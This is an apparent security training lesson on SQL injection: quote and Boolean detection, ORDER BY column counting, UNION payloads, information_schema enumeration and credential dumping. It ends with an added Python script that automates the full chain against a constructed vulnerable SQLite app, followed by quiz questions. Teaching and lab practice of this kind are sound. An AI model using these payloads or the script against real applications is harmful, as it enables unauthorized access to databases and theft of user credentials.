
With a solid understanding of why SQL injection occurs, it's time to explore practical exploitation techniques. This lesson covers the core methods you'll use to discover and exploit SQL injection vulnerabilities in real applications.
Before you can exploit SQL injection, you need to find it. Every place where user input reaches the database is potentially vulnerable. Login forms, search boxes, URL parameters, cookies, and HTTP headers all deserve testing.
The classic detection method is to insert a single quote into the input. In a query that wraps your input in a string literal, the extra quote closes that literal early and leaves the rest of the query syntactically broken. If the application returns a database error, you've likely found an injection point. An error message mentioning SQL syntax, MySQL, PostgreSQL, SQLSTATE, or similar database terms confirms that your input reached the database layer.
However, many modern applications hide database errors behind generic messages. In these cases, you can use Boolean-based detection. Append ' AND '1'='1 and then ' AND '1'='2 to a value the application already accepts (an existing product name, a real username). If the application behaves differently for these two inputs, even subtly, SQL injection is likely present. The first condition is true and should return the normal result for that value, while the second is false and should change the response, typically to an empty result. These payloads assume your input lands inside a single-quoted string; for a numeric parameter, drop the quotes and use AND 1=1 and AND 1=2 instead.
Once you've confirmed an injection point, UNION attacks provide a powerful method for extracting data from the database. The UNION operator in SQL combines the results of multiple SELECT queries, and attackers use this to append their own queries to legitimate ones.
The first challenge is determining how many columns the original query returns, since UNION requires matching column counts. Use ORDER BY clauses with increasing column positions until you get an error. If ORDER BY 5 works but ORDER BY 6 fails, the query returns 5 columns. When errors are hidden, the failure still shows up as a changed response (an empty page, a generic error, a different status code), so compare each response against the ORDER BY 1 baseline rather than looking for an explicit error.
With the column count known, you can construct a UNION injection. Start with a payload like ' UNION SELECT NULL,NULL,NULL,NULL,NULL-- using the appropriate number of NULLs; NULL is compatible with every column type, so it cannot fail on a type mismatch. The trailing comment discards the rest of the original query, including the closing quote. In MySQL, a -- comment only works when followed by a space (send "-- " or use "#"), which is a common reason a payload that looks right still errors. If this returns without error, you've successfully appended your own query.
Next, determine which columns display output on the page. Replace NULL values one at a time with recognizable strings like 'test1'. When a test string appears in the response, you've found a column suitable for extracting data.
With working UNION injection, you can explore the entire database. Different database systems provide different methods for enumeration. In MySQL, the information_schema database contains metadata about all tables and columns. Query information_schema.tables to list tables, then information_schema.columns to discover column names. Filtering with table_schema=database() restricts the listing to the application's own schema and skips the built-in system tables. PostgreSQL and SQL Server expose information_schema as well; Oracle uses all_tables and all_tab_columns instead.
Build your payload incrementally. Start by extracting the database version and current user to understand what you're working with (in MySQL, version() or @@version, user(), and database()). Then enumerate table names, identify interesting tables like "users" or "credentials," and extract their column structures. Finally, dump the actual data from these columns.
Each extraction requires a carefully crafted UNION query. For a three-column query whose first column is displayed, ' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- reveals the application's table names. Once you find a target table, ' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- reveals its structure, and ' UNION SELECT username,password,NULL FROM users-- dumps the rows if two columns are displayed. If only one column shows output, MySQL's GROUP_CONCAT(username,':',password) packs every row into a single value. Remember the trailing space after -- in MySQL.
The process is methodical: detect, enumerate, and extract. With patience and careful query construction, you can map and dump entire databases through a single injection point.
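The detect, enumerate, and extract chain above, as an added example that is not part of the original lesson. It runs the whole procedure against a deliberately vulnerable search page backed by an in-memory SQLite database so it works offline; the application, the table names, and every row are constructed for the example. SQLite stands in for MySQL, which changes two details: table and column metadata come from sqlite_master and pragma_table_info() instead of information_schema (the MySQL equivalents are noted in comments), and a bare -- comment needs no trailing space. The page template renders only two of the three queried columns, so the marker-string step actually has something to discover.

```python
"""Added example (not from the Loopus lesson): detect, enumerate and extract
through one injection point.  SQLite stands in for MySQL here so the code
runs offline; the target app, tables and rows are all constructed."""
import sqlite3


class VulnerableApp:
    """Search page that concatenates user input straight into SQL."""

    def __init__(self, verbose_errors=True):
        self.verbose_errors = verbose_errors
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript("""
            CREATE TABLE products(id INTEGER, name TEXT, price REAL);
            INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.5);
            CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
            INSERT INTO users VALUES (1, 'admin', 'S3cr3t!'), (2, 'bob', 'hunter2');
        """)

    def search(self, term):
        # Injection point: a quote inside `term` closes the string literal early.
        sql = f"SELECT id, name, price FROM products WHERE name = '{term}'"
        try:
            rows = self.conn.execute(sql).fetchall()
        except sqlite3.Error as exc:
            if self.verbose_errors:
                return f"Database error (sqlite3): {exc}"   # leaks a database term
            return "Something went wrong"                   # generic error page
        # The template prints only id and name; price is queried but never shown.
        return "\n".join(f"{r[0]}: {r[1]}" for r in rows) or "No results"


# ---- attacker side ----------------------------------------------------------

def shown(response):
    """Parse the rendered page back into the (id, name) pairs it displayed."""
    return [tuple(line.split(": ", 1)) for line in response.splitlines() if ": " in line]


def detect_error_based(app):
    """A lone quote breaks the literal; only a verbose app leaks a database term."""
    resp = app.search("'").lower()
    return any(w in resp for w in ("sql", "syntax", "ora-"))


def detect_boolean_based(app, known="Widget"):
    """True and false conditions appended to a valid value must give different pages."""
    return app.search(known + "' AND '1'='1") != app.search(known + "' AND '1'='2")


def find_column_count(app, known="Widget", limit=20):
    """ORDER BY n works up to the column count; compare against the ORDER BY 1 page."""
    baseline = app.search(f"{known}' ORDER BY 1--")
    for n in range(2, limit + 1):
        if app.search(f"{known}' ORDER BY {n}--") != baseline:
            return n - 1
    return None


def union_payload(exprs, ncols, from_clause=""):
    """' UNION SELECT ... with NULL in every column not listed in `exprs`.
    A search term that matches nothing empties the original result set, so the
    page shows only the injected rows."""
    cols = [exprs.get(i, "NULL") for i in range(ncols)]
    tail = f" {from_clause}" if from_clause else ""
    return "nomatch' UNION SELECT " + ",".join(cols) + tail + "--"


def find_visible_columns(app, ncols):
    """Swap one NULL at a time for a marker string and look for it on the page."""
    return [i for i in range(ncols)
            if f"marker{i}" in app.search(union_payload({i: f"'marker{i}'"}, ncols))]


def extract(app, ncols, col, expr, from_clause):
    """Pull one expression's values out through a single displayed column.
    Works for col 0 or 1 because the page prints those query columns in order."""
    resp = app.search(union_payload({col: expr}, ncols, from_clause))
    return sorted(row[col] for row in shown(resp))


def attack(app):
    """Full chain: detect, count columns, find displayed ones, enumerate, dump."""
    if not (detect_error_based(app) or detect_boolean_based(app)):
        raise RuntimeError("no injection detected")
    ncols = find_column_count(app)
    visible = find_visible_columns(app, ncols)
    col = visible[0]
    # MySQL: SELECT table_name FROM information_schema.tables WHERE table_schema=database()
    tables = extract(app, ncols, col, "name", "FROM sqlite_master WHERE type='table'")
    # MySQL: SELECT column_name FROM information_schema.columns WHERE table_name='users'
    user_columns = extract(app, ncols, col, "name", "FROM pragma_table_info('users')")
    # Two displayed columns let username and password come back side by side.
    creds = shown(app.search(union_payload(
        {visible[0]: "username", visible[1]: "password"}, ncols, "FROM users")))
    return {"columns": ncols, "visible": visible, "tables": tables,
            "user_columns": user_columns, "credentials": sorted(creds)}


if __name__ == "__main__":
    print(attack(VulnerableApp(verbose_errors=False)))
```

Run it with verbose_errors=False to see the hidden-error case: the single-quote probe reports nothing, the Boolean pair still exposes the injection, and the ORDER BY loop finds the column count purely from the response changing. Against a real target, app.search() would be an HTTP request and shown() a parser for the page's HTML; the payload construction is unchanged.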
What must match in UNION queries?
What SQL clause finds column count?
What operator combines SELECT results?
What characters comment out SQL in MySQL?